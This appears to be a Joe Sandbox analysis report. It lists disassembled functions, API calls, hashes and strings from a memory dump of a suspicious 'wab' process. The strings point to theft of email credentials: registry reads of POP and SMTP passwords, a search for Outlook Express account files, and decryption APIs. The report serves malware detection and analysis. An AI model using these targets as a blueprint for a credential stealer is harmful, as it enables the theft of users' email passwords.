                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1033339047-0
                                                                                                                                                                                                                    • Opcode ID: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
                                                                                                                                                                                                                    • Instruction ID: 91b6e48186620c166d1d4af44a265f78501a0d7a4e3c1a8b362a1fb29a74aa2a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17F0F9B5901300AFE7549B3CED0672676E4E75C356F04983FA30A8A2F2EB79C8448B08
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00406CCE Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@mallocmemcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3831604043-0
                                                                                                                                                                                                                    • Opcode ID: 6dc2a86f1fe2ee347426ab0121a461cac49b5a84b0ae56981e7af52698dffbe8
                                                                                                                                                                                                                    • Instruction ID: 120c5a36fa875b11696935209168df4f9df621bec9a22d80de65970bbd8b26ad
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6dc2a86f1fe2ee347426ab0121a461cac49b5a84b0ae56981e7af52698dffbe8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13F0E9727053225FD708EB75B94184B73DDAF84324712482FF505E7282D7389C60CB59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00406E26 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
                                                                                                                                                                                                                      • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
                                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 00406E44
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                    • String ID: Arial
                                                                                                                                                                                                                    • API String ID: 3853255127-493054409
                                                                                                                                                                                                                    • Opcode ID: af81b5a79715ac1c537919aec0876ca352f4b846121989fe158db9d7d4b71e29
                                                                                                                                                                                                                    • Instruction ID: b68263c9f29210b4531b01fb65f498acbd183b68a5d206dac463ad1e531dcf8e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: af81b5a79715ac1c537919aec0876ca352f4b846121989fe158db9d7d4b71e29
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FFD0C974E4020C67DA10B7A0FC07F49776C5B01705F510421B901B10E2EAA4A15886D9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00444A0F Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                    • Instruction ID: ba634a3ae7870b83a4a63a7f1e5f980291c684f9ee159ca978f4bf55c64cb7ac
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C21F9521C82826FFB218BB44C017676FD9CBD3364B190A87E040EB243D5AC5856937E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040CB90 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00401E60: memset.MSVCRT ref: 00401E82
                                                                                                                                                                                                                      • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401E9B
                                                                                                                                                                                                                      • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EA9
                                                                                                                                                                                                                      • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EEF
                                                                                                                                                                                                                      • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EFD
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040CBE4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strlen$_strcmpimemset
                                                                                                                                                                                                                    • String ID: /stext
                                                                                                                                                                                                                    • API String ID: 520177685-3817206916
                                                                                                                                                                                                                    • Opcode ID: 1152ae9ba3ffa0329dd0f68586efa17a4cc19575da3326fd738d138d66e7bba5
                                                                                                                                                                                                                    • Instruction ID: cdbc65eb55c3596dd52c6b91df7f07afa5e13005eab10b9a6f004d04cd94ae5a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1152ae9ba3ffa0329dd0f68586efa17a4cc19575da3326fd738d138d66e7bba5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE216271618111DFD35CEB39D8C1A66B3A9FF04314B15427FF41AA7282C738EC118B89
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00444A4E Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                    • Instruction ID: 64d8077581e7bfcf5b5a7686d9ec621b59dbeaea1ec513f5aad7139115001ce4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C012D015C564139FB20A6F50C02BBB5F8D8AD7364B181B4BF150F7293D99C8D16937E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00444A6B Relevance: 3.1, APIs: 2, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00444A5C,00444A45), ref: 00444A7E
                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00444A5C,00444A45), ref: 00444A92
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                    • Instruction ID: 9d415219164cce1615491981170e8b778fb578cfb811cd04a9329a68800e1f42
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DCF0C2412C52817DFB2195F50C42BBB4FCC8AE7360B280B47B110EB283D49D8D1693BE
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040472F Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 145871493-0
                                                                                                                                                                                                                    • Opcode ID: 19cbb58c83f46949a6f81fbd15abd7b556fa9c3d80d4a4eb7eee3cb29104cd1a
                                                                                                                                                                                                                    • Instruction ID: 2550b76864eeaa7c500838184e9c491a546ed4ce74a868b02878dd57666eb7ef
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19cbb58c83f46949a6f81fbd15abd7b556fa9c3d80d4a4eb7eee3cb29104cd1a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5F01BF4600B029FD760AF35E848B9B77E5AF86710F00453EF665E3182D778A545CB58
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004103E0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410407
                                                                                                                                                                                                                      • Part of subcall function 004102F8: memset.MSVCRT ref: 00410316
                                                                                                                                                                                                                      • Part of subcall function 004102F8: _itoa.MSVCRT ref: 0041032D
                                                                                                                                                                                                                      • Part of subcall function 004102F8: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0041033C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4165544737-0
                                                                                                                                                                                                                    • Opcode ID: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
                                                                                                                                                                                                                    • Instruction ID: a6fec7de448531cc7e5bdd8bb9ba05dfe42c6da5839e04c605b7484fd2ec2d67
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23E0BD3204060EBFCF125F80EC05AAA7BA6FF04354F24886AFD6804121D77299F0AB99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00404780 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                    • Opcode ID: 0080a8822f3c614f9ebefc2abddcc045fe481ba4110b5f37c1852287057a9d03
                                                                                                                                                                                                                    • Instruction ID: 32a23a6afe1256adb8d295dcdce629e4b632fcbc5e0d618fa027d99050396328
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0080a8822f3c614f9ebefc2abddcc045fe481ba4110b5f37c1852287057a9d03
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7D012714003118FDB609F14FD4CBA173E8AF41312F1504B8E994AB192C3749840CA58
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00406AB8 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040ABFF,00000000), ref: 00406ACA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                    • Opcode ID: 1ce9c131fa00a6cba9e51da9fc4262f8f7b5bc2fb1b2ae73e770c5136e6a3475
                                                                                                                                                                                                                    • Instruction ID: 174152b0962da7481451d0c07619c80c3ba7c59bd8607505f6d9dddbb6799519
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ce9c131fa00a6cba9e51da9fc4262f8f7b5bc2fb1b2ae73e770c5136e6a3475
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08C012F06503007FFF204B10AC0AF37369DD780700F1044207E00E40E1C2A14C40C524
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00410166 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                    • Opcode ID: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
                                                                                                                                                                                                                    • Instruction ID: 507e23945262d0460dd2b0da46a8ed0ea94319227dbecdfb5597338915b85de2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6EC04C35510B019BEB219B22D949753B7E4AB05316F40C81CA59695451D7BCE494CE18
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00410663 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,?,Function_000105DD,00000000), ref: 00410672
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: EnumNamesResource
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3334572018-0
                                                                                                                                                                                                                    • Opcode ID: 11eb8b3ad73b6762afc3db70ccaf6c8089b2cfe60785521265f3d13c2ac885fb
                                                                                                                                                                                                                    • Instruction ID: e40f58546d13f5b106010a29914381b046978f91ca1901c00a2019c551bf0e65
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11eb8b3ad73b6762afc3db70ccaf6c8089b2cfe60785521265f3d13c2ac885fb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0C09B31554341A7C701DF108C09F1A7695BB55705F504C297151940A4C7514054DB15
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00407D1F Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindClose.KERNELBASE(?,00407C39,?,?,00000000,.8D,0044373A,*.oeaccount,.8D,?,00000104), ref: 00407D29
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                                                                                    • Opcode ID: fadcbaaacaeb9138fef9dc8452ad8ac79757f966f14a2d9034369e41b7735666
                                                                                                                                                                                                                    • Instruction ID: e21386352e8edd65572014a1fcaa83e24a75218a268847cd9e3b74dd15e40f0a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fadcbaaacaeb9138fef9dc8452ad8ac79757f966f14a2d9034369e41b7735666
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50C092349109018FD62C9F38DC5A52A77A0BF5A3343B40F6CA0F3D20F0E778A842CA08
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00410411 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                                                                    • Opcode ID: 21d2125e3753e601ca1b20deba59a5865270c48a78257e55b283f3ccc3de6cc0
                                                                                                                                                                                                                    • Instruction ID: 9e85f5290c785a84adc9a585aa79e4266a03e2402c05001ad2ac5d5d83fda341
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21d2125e3753e601ca1b20deba59a5865270c48a78257e55b283f3ccc3de6cc0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40C09B39544301BFDE114F40FD05F09BB61BB84F05F504414B244240B182714414EB57
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00406D1F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                    • Opcode ID: 2ea5a109eb267fb6083926362ae3c8176b926bbef034cd1da8757df3be379db2
                                                                                                                                                                                                                    • Instruction ID: 1a596b20ff26773e60743876e99a20c5f0c5c53ebb8dbfb842e64d2fd6ed3a7e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ea5a109eb267fb6083926362ae3c8176b926bbef034cd1da8757df3be379db2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76B012792108005FCF1807349C4904D35506F45631760073CF033C00F0D720CC60BA00
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                    Function 004047C6 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A6B,?,00404981,?,?,00000000,?,00000000,?), ref: 004047D5
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047E9
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045175C,CryptReleaseContext), ref: 004047F5
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045175C,CryptCreateHash), ref: 00404801
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045175C,CryptGetHashParam), ref: 0040480D
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045175C,CryptHashData), ref: 00404819
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045175C,CryptDestroyHash), ref: 00404825
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045175C,CryptDecrypt), ref: 00404831
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045175C,CryptDeriveKey), ref: 0040483D
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045175C,CryptImportKey), ref: 00404849
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045175C,CryptDestroyKey), ref: 00404855
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                    • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                                                    • API String ID: 2238633743-192783356
                                                                                                                                                                                                                    • Opcode ID: cdc1f63c0c232f946f357b8b2aefe836e2e50651c8dba3e6496bd37ee8642a43
                                                                                                                                                                                                                    • Instruction ID: 96d911507a8a1b00aef88e3b883ab5eac538cf63a3166b36270edd586bbeed94
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cdc1f63c0c232f946f357b8b2aefe836e2e50651c8dba3e6496bd37ee8642a43
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A501C974940744AFDB31AF769C09E06BEF1EFA97003224D2EE2C553650D77AA010DE49
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00402DA5 Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                      • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                                                      • Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A
                                                                                                                                                                                                                      • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00402EBC
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00402ECF
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00402F5C
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00402F69
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402FC3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy$QueryValue$CloseOpen
                                                                                                                                                                                                                    • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                                                                                                    • API String ID: 52435246-1534328989
                                                                                                                                                                                                                    • Opcode ID: 8606da5831358c67b4a99ee8b6ad117f72868ee6eb846870c269daa592ef00d8
                                                                                                                                                                                                                    • Instruction ID: 400a04a5c8efacb9c4641a70875855bf6b7e4888715d32951425251a7c23a99d
